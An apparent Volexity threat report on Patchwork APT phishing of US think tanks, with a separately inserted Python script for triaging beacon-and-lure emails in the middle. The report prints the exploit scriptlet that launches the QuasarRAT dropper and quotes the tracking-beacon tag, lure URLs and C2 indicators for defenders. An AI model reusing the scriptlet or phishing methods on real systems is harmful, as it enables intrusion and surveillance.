<!DOCTYPE html> <html lang="en-US" class="no-js"> <head> <meta charset="UTF-8"> <title>Patchwork APT Group Targets US Think Tanks | Volexity</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="canonical" href="https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/" /> <meta property="og:type" content="article" /> <meta property="og:title" content="Patchwork APT Group Targets US Think Tanks" /> <meta property="og:site_name" content="Volexity" /> <meta property="article:published_time" content="2018-06-07T18:23:38+00:00" /> <meta property="article:modified_time" content="2024-11-21T16:35:48+00:00" /> <meta property="og:image" content="https://www.volexity.com/wp-content/uploads/2018/05/Patchwork-APT-Group.png" /> <meta name="author" content="Volexity" /> </head> <body class="post-template-default single single-post postid-1073 single-format-standard cookies-not-set ie ie7 windows"> <main class="main"> <div class="container"> <section class="row int"> <article class="col-sm-8"> <div class="post-content composition"> <h2 class="post-title">Patchwork APT Group Targets US Think Tanks</h2> <p class="post-date">June 7, 2018</p> <p class="post-byline">by Matthew Meltzer, Sean Koessel, Steven Adair</p> <p><img fetchpriority="high" decoding="async" class="alignnone wp-image-1074 size-full" src="https://www.volexity.com/wp-content/uploads/2018/05/Patchwork-APT-Group.png" alt="" width="1396" height="830" srcset="https://www.volexity.com/wp-content/uploads/2018/05/Patchwork-APT-Group.png 1396w, 
https://www.volexity.com/wp-content/uploads/2018/05/Patchwork-APT-Group-300x178.png 300w, https://www.volexity.com/wp-content/uploads/2018/05/Patchwork-APT-Group-768x457.png 768w, https://www.volexity.com/wp-content/uploads/2018/05/Patchwork-APT-Group-1024x609.png 1024w" sizes="(max-width: 1396px) 100vw, 1396px" /></p> <p>In March and April 2018, Volexity identified multiple spear phishing campaigns attributed to Patchwork, an Indian APT group also known as Dropping Elephant. This increase in threat activity was consistent with other observations documented over the last few months in blogs by 360 Threat Intelligence Center analyzing attacks on <a href="https://ti.360.net/blog/articles/analysis-of-apt-c-09-target-china/">Chinese organizations</a> and Trend Micro noting targets in <a href="https://blog.trendmicro.com/trendlabs-security-intelligence/confucius-update-new-tools-and-techniques-further-connections-with-patchwork/">South Asia</a>. From the attacks observed by Volexity, what is most notable is that Patchwork has pivoted its targeting and has launched attacks directly against US-based think tanks. Volexity has also found that, in addition to sending malware lures, the Patchwork threat actors are leveraging unique tracking links in their e-mails for the purpose of identifying which recipients opened their e-mail messages.</p> <p>In three observed spear phishing campaigns, the threat actors leveraged domains and themes mimicking those of well-known think tank organizations in the United States. 
The group lifted articles and themes from the <a href="https://www.cfr.org/">Council on Foreign Relations (CFR)</a>, the <a href="https://www.csis.org/">Center for Strategic and International Studies (CSIS)</a>, and the <a href="https://www.merics.org/">Mercator Institute for China Studies (MERICS)</a> for use in their spear phishing lures and malicious Rich Text Format (RTF) documents. Strangely, in one case, the threat actors also appear to have used a domain name similar to that of the <a href="https://www.fpri.org/">Foreign Policy Research Institute (FPRI)</a> in a message purporting to be from CFR. Each of the spear phishing attacks contained links to .doc files, which were really RTF documents that attempt to exploit CVE-2017-8570 (Composite Moniker). The threat actors appear to have leveraged publicly available exploit code that can be found on GitHub at the URL: https://github.com/rxwx/CVE-2017-8570. If the exploit is successful, the threat actors will attempt to drop and execute QuasarRAT. Details of the malware and the associated attacks are listed below.</p> <h3>Spear Phishing Messages</h3> <p>Each e-mail was sent from the attacker-controlled domain mailcenter.support. This domain was not only used to send the phishing e-mails, but also to track which targets opened them. Within each of the HTML-formatted messages, an embedded image tag is used to beacon home to the attacker's domain, carrying a unique identifier specific to the recipient:</p> <blockquote><p><em>&lt;img src=3D"hxxps://www.mailcenter.support/track/<strong>&lt;unique_32_byte_identifier&gt;</strong>" width=3D"0" height=3D"0" /&gt;</em></p></blockquote> <p>While the use of e-mail recipient tracking, a linked RTF document, and a final payload (a QuasarRAT variant) remained the same, certain elements differed across the campaigns observed.</p> <p>
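The beacon-and-lure pattern described above lends itself to a mechanical triage check on inbound mail. The following Python is an added example written for this edit, not code from Volexity or from the original post. The message it parses is constructed: the .test domains, the lookalike sender and the 32-character hex token are placeholders in the shape the post describes, not observed indicators. It assumes the per-recipient token is a run of hex digits at the end of the URL path and that the legitimate sending domains of the organisation named in the From display name are known (the KNOWN_SENDERS table is an assumption for the example). It decodes the quoted-printable HTML body (the reason the quoted tag reads =3D rather than =), flags zero-sized images whose URL carries a token, lists linked Office/RTF documents, and compares the claimed organisation against the actual sending domain.

```python
"""Triage an HTML spear-phishing message for the beacon-and-lure pattern.
Added example; not Volexity's code.  All domains and the token are constructed."""
import email
import re
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample.  The HTML part is quoted-printable, which is why '='
# appears as '=3D' and why a long line is split with a trailing '='.
RAW_MESSAGE = b"""\
From: Council on Foreign Relations <news@lookalike-sender.test>
To: analyst@thinktank.test
Subject: The Four Traps China May Fall Into
Content-Type: text/html; charset="utf-8"
Content-Transfer-Encoding: quoted-printable

<html><body><p>Copied article text goes here.</p>
<a href=3D"http://lure-host.test/Four_Traps.doc">Download File</a>
<img src=3D"https://mailhost.test/track/0123456789abcdef0123456789abcdef" w=
idth=3D"0" height=3D"0" />
</body></html>
"""

# Assumption (constructed for the example): domains each claimed organisation
# legitimately mails from.  A real deployment keeps this in configuration.
KNOWN_SENDERS = {"council on foreign relations": {"cfr.org"}}

# Assumption: the per-recipient token is a run of hex digits ending the path.
TOKEN_RE = re.compile(r"/([0-9a-f]{16,})/?$", re.IGNORECASE)
DOCUMENT_EXTENSIONS = (".doc", ".docx", ".rtf")


class TagCollector(HTMLParser):
    """Collect <img> attribute sets and <a href> targets from the HTML body."""

    def __init__(self):
        super().__init__()
        self.images = []
        self.links = []

    def handle_starttag(self, tag, attrs):  # HTMLParser also calls this for <img ... />
        attrs = dict(attrs)
        if tag == "img":
            self.images.append(attrs)
        elif tag == "a" and attrs.get("href"):
            self.links.append(attrs["href"])


def find_tracking_beacons(images):
    """Return (url, token) for invisible images whose URL path ends in a token."""
    beacons = []
    for attrs in images:
        src = attrs.get("src", "")
        invisible = attrs.get("width") == "0" and attrs.get("height") == "0"
        match = TOKEN_RE.search(urlparse(src).path)
        if invisible and match:
            beacons.append((src, match.group(1).lower()))
    return beacons


def find_document_links(links):
    """Return hyperlinks whose path ends in an Office or RTF extension."""
    return [h for h in links if urlparse(h).path.lower().endswith(DOCUMENT_EXTENSIONS)]


def sender_mismatch(display_name, domain):
    """True when the claimed organisation is known and the sending domain is not
    one of its own; None when nothing is known about the claimed name."""
    expected = KNOWN_SENDERS.get(display_name.strip().lower())
    if expected is None:
        return None
    return domain.lower() not in expected


def triage(raw_bytes):
    """Parse a raw message and return the indicators a reviewer would look at first."""
    msg = email.message_from_bytes(raw_bytes, policy=policy.default)
    sender = msg["From"].addresses[0]   # structured header from the default policy
    body = msg.get_content()            # quoted-printable is decoded here
    collector = TagCollector()
    collector.feed(body)
    return {
        "sender_domain": sender.domain,
        "sender_mismatch": sender_mismatch(sender.display_name, sender.domain),
        "beacons": find_tracking_beacons(collector.images),
        "document_links": find_document_links(collector.links),
    }


if __name__ == "__main__":
    for key, value in triage(RAW_MESSAGE).items():
        print(f"{key}: {value}")
```

Run as a script it prints the four findings for the constructed message; on real mail, pass the raw bytes from the mail store instead. The beacon check keys on exactly the combination the post describes, an invisible image whose URL path ends in a per-recipient token, so ordinary marketing tracking pixels will also trip it; that is the intended trade-off for a triage tool, and the sender-domain mismatch and the linked document are what separate a lure from a newsletter.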
Details on each of the messages are listed below.</p> <h5>Message 1:</h5> <table style="border: 1px solid #c6c6c6;" border="1"> <tbody> <tr> <th style="background-color: #f2f2f2; color: #505050; text-align: left; padding: 6px;" valign="middle">Headers</th> <th style="text-align: left; color: #505050; padding: 6px;" valign="middle">Received: by mailcenter.support</th> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px;">Sender</th> <td style="padding: 6px;">China Policy Analysis <<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="7b0b0e191712181a0f121415083b181312151a0b14171218021a151a17020812085514091c">[email protected]</a>></td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px;">Subject</th> <td style="padding: 6px;">Chinas Arctic Dream</td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px;">Body</th> <td style="padding: 6px;"><span class="nolink">Content and images included within the e-mail body were a direct copy of the following CSIS article:</span></p> <p><span class="nolink"> <span class="nolink">https://www.csis.org/analysis/chinas-arctic-dream</span></span></td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px;">Notes</th> <td style="padding: 6px;"><span class="nolink"><span class="nolink"><span class="nolink"><span class="nolink">The hyperlinked text <strong>Download File of "China's Arctic Dream"</strong> within the e-mail body lead to a malicious RTF document located at the URL</span></span></span></span></p> <p><span class="nolink"><span class="nolink"><span class="nolink"><span class="nolink"> <strong>hxxp://chinapolicyanalysis.org/Chinas_Arctic_Dream.doc</strong>.</span></span></span></span></p> <p><span class="nolink">The chinapolicyanalysis.org domain was used <span class="hljs-keyword">as</span> <span class="hljs-keyword">the</span> sender 
address, <span class="hljs-keyword">as</span> well <span class="hljs-keyword">as</span> <span class="hljs-keyword">the</span> hosting location <span class="hljs-keyword">of</span> <span class="hljs-keyword">the</span> malicious RTF document.</span></td> </tr> </tbody> </table> <h5>Message 2:</h5> <table style="border: 1px solid #c6c6c6;" border="1"> <tbody> <tr style="height: 41px;"> <th style="background-color: #f2f2f2; color: #505050; text-align: left; padding: 6px; height: 41px;" valign="middle">Headers</th> <th style="text-align: left; color: #505050; padding: 6px; height: 41px;" valign="middle">Received: by mailcenter.support</th> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px;">Sender</th> <td style="padding: 6px;">Council on Foreign Relations <<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="c1b6a4a3b1b3a8afb581a7b1b3a8a8efafa4b5">[email protected]</a>></td> </tr> <tr style="height: 41px;"> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; height: 41px;">Subject</th> <td style="padding: 6px; height: 41px;">The Four Traps China May Fall Into</td> </tr> <tr style="height: 69px;"> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; height: 69px;">Body</th> <td style="padding: 6px; height: 69px;"><span class="nolink">Content and images included within the e-mail body were a direct copy of the following CFR article:<br /> https://www.cfr.org/blog/four-traps-china-may-fall</span></td> </tr> <tr style="height: 125px;"> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; height: 125px;">Notes</th> <td style="padding: 6px; height: 125px;"><span class="nolink"><span class="nolink">Multiple hyperlinks within the e-mail body lead to a malicious RTF document located at the URL</span></span></p> <p><span class="nolink"><span class="nolink"> 
<strong>hxxp://fprii.net/The_Four_Traps_for_China.doc.</strong></span></span></p> <p><span class="nolink"><span class="nolink"><strong><br /> </strong></span></span><span class="nolink">The fprii.net domain was used <span class="hljs-keyword">as</span> <span class="hljs-keyword">the</span> sender address, <span class="hljs-keyword">as</span> well <span class="hljs-keyword">as</span> <span class="hljs-keyword">the</span> hosting location <span class="hljs-keyword">of</span> <span class="hljs-keyword">the</span> malicious RTF document. The structure <span class="hljs-keyword">of</span> <span class="hljs-keyword">the</span> domain mimics <span class="hljs-keyword">the</span> Foreign Policy Research Institute (FPRI), whose actual domain is fpri.net.<br /> </span></td> </tr> </tbody> </table> <h5>Message 3:</h5> <table style="border: 1px solid #c6c6c6;" border="1"> <tbody> <tr> <th style="background-color: #f2f2f2; color: #505050; text-align: left; padding: 6px;" valign="middle">Headers</th> <th style="text-align: left; color: #505050; padding: 6px;" valign="middle">Received: by mailcenter.support</th> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px;">Sender</th> <td style="padding: 6px;">Mercator Institute for China Studies <<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="8bfbfee9e7e2e8eaffe2e4e5f8cbe6eef9e2e8e8f8a5e4f9ec">[email protected]</a>></td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px;">Subject</th> <td style="padding: 6px;">Authoritarian advance Responding to Chinas growing political influence in Europe</td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px;">Body</th> <td style="padding: 6px;"><span class="nolink">Content and images included within the e-mail body were a direct copy of the following MERICS report:</span></p> <p><span class="nolink"> 
https://www.merics.org/sites/default/files/2018-02/GPPi_MERICS_Authoritarian_Advance_2018_1.pdf</span></td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px;">Notes</th> <td style="padding: 6px;"><span class="nolink">The hyperlinked text <strong>Click here to download the report</strong> within the e-mail body lead to a malicious RTF document located at the URL</span></p> <p><span class="nolink"><strong>hxxp://www.mericcs.org/GPPi_MERICS_Authoritarian_Advance_2018_1Q.doc.<br /> </strong></span></p> <p> </p> <p>The mericcs.org domain was used <span class="hljs-keyword">as</span> <span class="hljs-keyword">the</span> sender address, <span class="hljs-keyword">as</span> well <span class="hljs-keyword">as</span> <span class="hljs-keyword">the</span> hosting location <span class="hljs-keyword">of</span> <span class="hljs-keyword">the</span> malicious RTF document. The structure <span class="hljs-keyword">of</span> <span class="hljs-keyword">the</span> domain mimics <span class="hljs-keyword">the</span> Mercator Institute <span class="hljs-keyword">for</span> China Studies (MERICS), whose actual domain is merics.org.</td> </tr> </tbody> </table> <h5>Sample Message</h5> <p>The image below shows an example of how the spear phishing message would look to a recipient.</p> <p><img decoding="async" class="alignnone wp-image-1096" src="https://www.volexity.com/wp-content/uploads/2018/06/4traps-email.png" alt="" width="750" height="676" srcset="https://www.volexity.com/wp-content/uploads/2018/06/4traps-email.png 950w, https://www.volexity.com/wp-content/uploads/2018/06/4traps-email-300x270.png 300w, https://www.volexity.com/wp-content/uploads/2018/06/4traps-email-768x692.png 768w" sizes="(max-width: 750px) 100vw, 750px" /></p> <h3>Exploitation and Malware Execution</h3> <p>Upon opening the above attachments, the recipient will be presented with a document that is a direct copy of a blog post or report released by the think tank 
organization being impersonated. At first glance, everything might look legitimate, but in the background the target user has likely just been infected with QuasarRAT. QuasarRAT is a freely available "remote (administration|access) tool" (RAT) written in C# and distributed via Github. This RAT provides a variety of functionality that makes it particularly attractive to an attacker. This includes, but is not limited to, the following:</p> <ul> <li>AES encryption of network communication</li> <li>File management</li> <li>Functionality to download, upload, and execute files</li> <li>Keylogging</li> <li>Remote desktop access</li> <li>Remote webcam viewing</li> <li>Reverse proxy</li> <li>Browser and FTP client password recovery</li> </ul> <p>The images below are what a target user opening a malicious RTF document would see from within Microsoft Word.</p> <p><img decoding="async" class="wp-image-1077 alignleft" src="https://www.volexity.com/wp-content/uploads/2018/05/Patchwork_1.png" alt="" width="313" height="405" srcset="https://www.volexity.com/wp-content/uploads/2018/05/Patchwork_1.png 988w, https://www.volexity.com/wp-content/uploads/2018/05/Patchwork_1-232x300.png 232w, https://www.volexity.com/wp-content/uploads/2018/05/Patchwork_1-768x993.png 768w, https://www.volexity.com/wp-content/uploads/2018/05/Patchwork_1-792x1024.png 792w" sizes="(max-width: 313px) 100vw, 313px" /><img loading="lazy" decoding="async" class="wp-image-1082 alignnone" src="https://www.volexity.com/wp-content/uploads/2018/05/Patchwork_2-1.png" alt="" width="310" height="403" srcset="https://www.volexity.com/wp-content/uploads/2018/05/Patchwork_2-1.png 876w, https://www.volexity.com/wp-content/uploads/2018/05/Patchwork_2-1-231x300.png 231w, https://www.volexity.com/wp-content/uploads/2018/05/Patchwork_2-1-768x999.png 768w, https://www.volexity.com/wp-content/uploads/2018/05/Patchwork_2-1-787x1024.png 787w" sizes="(max-width: 310px) 100vw, 310px" /></p> <p>When the malicious RTF document is 
opened, two things happen that allow the attacker malware to run. First, the "<a href="https://securingtomorrow.mcafee.com/mcafee-labs/dropping-files-temp-folder-raises-security-concerns/">packager trick</a>" is leveraged in order to embed the initial QuasarRAT dropper (qrat.exe) in the malicious RTF document. Its called the "packager trick" because any file embedded in an RTF file using packager will be automatically dropped to the %tmp% folder (c:\Users\%username%\AppData\Local\Temp) when the RTF document is opened. Second, the threat actors exploit CVE-2017-8570 to achieve code execution via a malicious "scriptlet" file, or .sct file, which is also embedded in the malicious RTF document. The contents of the malicious scriptlet file (displayed below) clearly show the threat actor executing the initial "qrat.exe" dropper from the current user's %tmp% directory.</p> <p><img loading="lazy" decoding="async" class="wp-image-1083 alignnone" src="https://www.volexity.com/wp-content/uploads/2018/05/Patchwork_4.png" alt="" width="601" height="52" srcset="https://www.volexity.com/wp-content/uploads/2018/05/Patchwork_4.png 1266w, https://www.volexity.com/wp-content/uploads/2018/05/Patchwork_4-300x26.png 300w, https://www.volexity.com/wp-content/uploads/2018/05/Patchwork_4-768x67.png 768w, https://www.volexity.com/wp-content/uploads/2018/05/Patchwork_4-1024x89.png 1024w" sizes="(max-width: 601px) 100vw, 601px" /></p> <p><em>Note: The scriptlet code is an exact match to that shown on the Github page referenced earlier for <a href="https://github.com/rxwx/CVE-2017-8570">CVE-2017-8570</a>. 
The string "fjzmpcjvqp" is unique and not something likely to be present if the code was not generated with the same public POC exploit code.</em></p> <blockquote><p><?XML version="1.0"?><br /> <scriptlet><br /> <registration description="fjzmpcjvqp"<br /> progid="fjzmpcjvqp"<br /> version="1.00"<br /> classid="{204774CF-D251-4F02-855B-2BE70585184B}"<br /> remotable="true" ><br /> </registration><br /> <script language="JScript"><br /> <![CDATA[<br /> <strong>var r = new ActiveXObject("WScript.Shell").Run("cmd /c %tmp%\\qrat.exe",0,false);</strong><br /> exit();<br /> ]]><br /> </script><br /> </scriptlet></p></blockquote> <p>After the initial dropper (qrat.exe) has been executed by the embedded scriptlet, it creates a directory in <strong>C:\Users\%username%\AppData\Roaming\Microsoft Network\microsoft_network\1.0.0.0</strong> and unpacks/drops the final QuasarRAT binary named <strong>microsoft_network.exe. </strong></p> <p><img loading="lazy" decoding="async" class="wp-image-1084 alignnone" src="https://www.volexity.com/wp-content/uploads/2018/05/Patchwork_5.png" alt="" width="602" height="170" srcset="https://www.volexity.com/wp-content/uploads/2018/05/Patchwork_5.png 1140w, https://www.volexity.com/wp-content/uploads/2018/05/Patchwork_5-300x85.png 300w, https://www.volexity.com/wp-content/uploads/2018/05/Patchwork_5-768x217.png 768w, https://www.volexity.com/wp-content/uploads/2018/05/Patchwork_5-1024x289.png 1024w" sizes="(max-width: 602px) 100vw, 602px" /></p> <p>The malware also contains an embedded .NET wrapper DLL for creating and managing scheduled tasks on Windows systems. 
The file, named Microsoft.Win32.TaskScheduler.dll, is digitally signed by a certificate from <strong style="font-size: 1.6rem;">AirVPN</strong><span style="font-size: 1.6rem;">.</span></p> <p><img loading="lazy" decoding="async" class="alignnone wp-image-1090" src="https://www.volexity.com/wp-content/uploads/2018/05/Patchwork_7.png" alt="" width="302" height="354" srcset="https://www.volexity.com/wp-content/uploads/2018/05/Patchwork_7.png 824w, https://www.volexity.com/wp-content/uploads/2018/05/Patchwork_7-256x300.png 256w, https://www.volexity.com/wp-content/uploads/2018/05/Patchwork_7-768x900.png 768w" sizes="(max-width: 302px) 100vw, 302px" /></p> <p>This DLL is used to create a scheduled task that points to the QuasarRAT binary, <strong>microsoft_network.exe, </strong>allowing it to remain persistent after reboot.</p> <p><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1087" src="https://www.volexity.com/wp-content/uploads/2018/06/Patchwork_8.png" alt="" width="2462" height="846" /></p> <p>As seen in the image above, the QuasarRAT scheduled task is named Microsoft_Security_Task and runs at 12:00 AM each day. Once the task is triggered, it will then repeat every 5 minutes for 60 days. When executed, <strong>microsoft_network.exe </strong>will initiate a request to <strong>freegeoip.net</strong> in order to determine the geographical location of the infected host. Immediately following the request, the malware will begin to beacon over an encrypted connection to the threat actor's command and control domain<strong> tautiaos.com (43.249.37.199)</strong>. Several related samples were identified and are included in the File Indicators section below.</p> <h3>Conclusion</h3> <p>The addition of US-based think tanks to the list of organizations in the crosshairs of Patchwork shows an increasing diversity in the geographic regions being targeted. 
While there were a few peculiar components to some of the spear phish messages, the campaigns and themes were strategically relevant to the organizations being targeted. The Patchwork threat actors also appear to have adopted a technique seen from other APT groups where they are now tracking the effectiveness of their campaigns by recording which recipients have opened the phishing message. This information allows a threat actor to determine if their messages were delivered, which users are more susceptible to opening them, and basic information regarding the target's operating system and e-mail client (or browser). Finally, although the payload observed being delivered by Patchwork in these campaigns is a readily available open source RAT, it does allow for flexibility in interacting with compromised machines without needing to use custom malware. Volexity is actively tracking this group and the infrastructure currently in use for the benefit of its network security monitoring and threat intelligence customers.</p> <h3>File Indicators</h3> <h5>Samples Observed from Spear Phishing Messages Above</h5> <table style="border: 1px solid #c6c6c6; width: 797px; height: 180px;" border="1"> <tbody> <tr> <th style="background-color: #f2f2f2; color: #505050; text-align: left; padding: 6px;" valign="middle">Filename</th> <th style="text-align: left; background-color: #ffffff; color: #505050; padding: 6px;" valign="middle">Chinas_Arctic_Dream.doc</th> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px;">File Size</th> <td style="padding: 6px;">6587812 bytes</td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px;">MD5</th> <td style="padding: 6px;">598eeb6a18233023f3551097aa49b083</td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px;">SHA1</th> <td style="padding: 6px;">e9a46966f93fe15c22636a5033c61c725add8fa5</td> </tr> <tr> <th 
style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px;">Notes</th> <td style="padding: 6px;">Malicious RTF document that exploits CVE-2017-8570 and drops QuasarRAT file qrat.exe.</td> </tr> </tbody> </table> <table style="border: 1px solid #c6c6c6; width: 797px;" border="1"> <tbody> <tr> <th style="background-color: #f2f2f2; color: #505050; text-align: left; padding: 6px;" valign="middle">Filename</th> <th style="text-align: left; color: #505050; padding: 6px;" valign="middle">The_Four_Traps_for_China.doc</th> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px;">File Size</th> <td style="padding: 6px;">4428595 bytes</td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px;">MD5</th> <td style="padding: 6px;">7659c41a30976d523bb0fbb8cde49094</td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px;">SHA1</th> <td style="padding: 6px;">3f1f3e838a307aff52fbcb5bba5e4c8fe68c30e5</td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px;">Notes</th> <td style="padding: 6px;">Malicious RTF document that exploits CVE-2017-8570 and drops QuasarRAT file qrat.exe.</td> </tr> </tbody> </table> <table style="border: 1px solid #c6c6c6; width: 797px;" border="1"> <tbody> <tr> <th style="background-color: #f2f2f2; color: #505050; text-align: left; padding: 6px;" valign="middle">Filename</th> <th style="text-align: left; color: #505050; padding: 6px;" valign="middle">The_Four_Traps_for_China.doc</th> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px;">File Size</th> <td style="padding: 6px;">4428595 bytes</td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px;">MD5</th> <td style="padding: 6px;">7659c41a30976d523bb0fbb8cde49094</td> </tr> <tr> <th style="color: #505050; background-color: 
#f2f2f2; text-align: left; padding: 6px;">SHA1</th> <td style="padding: 6px;">3f1f3e838a307aff52fbcb5bba5e4c8fe68c30e5</td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px;">Notes</th> <td style="padding: 6px;">Malicious RTF document that exploits CVE-2017-8570 and drops QuasarRAT file qrat.exe.</td> </tr> </tbody> </table> <table style="border: 1px solid #c6c6c6; width: 797px; height: 180px;" border="1"> <tbody> <tr> <th style="background-color: #f2f2f2; color: #505050; text-align: left; padding: 6px; width: 89px;" valign="middle">Filename</th> <th style="text-align: left; color: #505050; padding: 6px; width: 707px;" valign="middle">qrat.exe</th> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 89px;">File Size</th> <td style="padding: 6px; width: 707px;"><span class="s1">1093120</span> bytes</td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 89px;">MD5</th> <td style="padding: 6px; width: 707px;"><span class="s1">c05e5131b196f43e1d02ca5ccc48ec0e</span></td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 89px;">SHA1</th> <td style="padding: 6px; width: 707px;"><span class="s1">f28c592833f234c619917b5c7d8974840a810247</span></td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 89px;">Notes</th> <td style="padding: 6px; width: 707px;">Dropper that installs QuasarRAT file microsoft_network.exe and scheduled task wrapper file Microsoft.Win32.TaskScheduler.dll.</td> </tr> </tbody> </table> <table style="border: 1px solid #c6c6c6; width: 853px;" border="1"> <tbody> <tr> <th style="background-color: #f2f2f2; color: #505050; text-align: left; padding: 6px; width: 89px;" valign="middle">Filename</th> <th style="text-align: left; color: #505050; padding: 6px; width: 763px;" 
valign="middle">microsoft_network.exe</th> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 89px;">File Size</th> <td style="padding: 6px; width: 763px;"><span class="s1">846336</span> bytes</td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 89px;">MD5</th> <td style="padding: 6px; width: 763px;"><span class="s1">9e4c373003c6d8f6597f96fc3ff1f49c</span></td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 89px;">SHA1</th> <td style="padding: 6px; width: 763px;"><span class="s1">b7319a5ccf605fb2ff7760130e212728bccad323</span></td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 89px;">Notes</th> <td style="padding: 6px; width: 763px;">QuasarRAT file that beacons to hardcoded IP 43.249.37.199 and the domain tautiaos.com. File is dropped to</p> <p> </p> <p>C:\Users\%USERNAME%\AppData\Roaming\Microsoft Network\microsoft_network\1.0.0.0\microsoft_network.exe.</td> </tr> </tbody> </table> <table style="border: 1px solid #c6c6c6; width: 863px; height: 220px;" border="1"> <tbody> <tr> <th style="background-color: #f2f2f2; color: #505050; text-align: left; padding: 6px; width: 88px;" valign="middle">Filename</th> <th style="text-align: left; color: #505050; padding: 6px; width: 774px;" valign="middle">Microsoft.Win32.TaskScheduler.dll</th> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 88px;">File Size</th> <td style="padding: 6px; width: 774px;">204488 bytes</td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 88px;">MD5</th> <td style="padding: 6px; width: 774px;"><span class="s1">6fa7fce844065ce9c605cbe713f3e170</span></td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 
88px;">SHA1</th> <td style="padding: 6px; width: 774px;"><span class="s1">2f7eaad80eab3e9dcc67a003968b35c227290c69</span></td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 88px;">Notes</th> <td style="padding: 6px; width: 774px;">.NET Task Scheduler Managed Wrapper from https://github.com/dahall/taskschedule. The DLL is also digitally signed by a certificate from "AirVPN".</td> </tr> </tbody> </table> <h5>Additional Observed Malware Files</h5> <table style="border: 1px solid #c6c6c6; width: 797px; height: 180px;" border="1"> <tbody> <tr> <th style="background-color: #f2f2f2; color: #505050; text-align: left; padding: 6px; width: 88px;" valign="middle">Filename</th> <th style="text-align: left; background-color: #ffffff; color: #505050; padding: 6px; width: 708px;" valign="middle"> <p class="p1"><span class="s1">Armed-Forces-Officers.doc</span></p> </th> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 88px;">File Size</th> <td style="padding: 6px; width: 708px;"> <p class="p1"><span class="s1">3226435 </span><span style="font-family: inherit; font-size: inherit;">bytes</span></p> </td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 88px;">MD5</th> <td style="padding: 6px; width: 708px;"> <p class="p1"><span class="s1">89beb207e7095d237c4d25c4c6e17e97</span></p> </td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 88px;">SHA1</th> <td style="padding: 6px; width: 708px;"> <p class="p1"><span class="s1">15010f7cea913f2a36c56da7d73c2b9eb5a3878f</span></p> </td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 88px;">Notes</th> <td style="padding: 6px; width: 708px;">Malicious RTF document that exploits CVE-2017-8570 and drops a Delphi RAT with the file name vsrss.exe.</td> </tr> </tbody> 
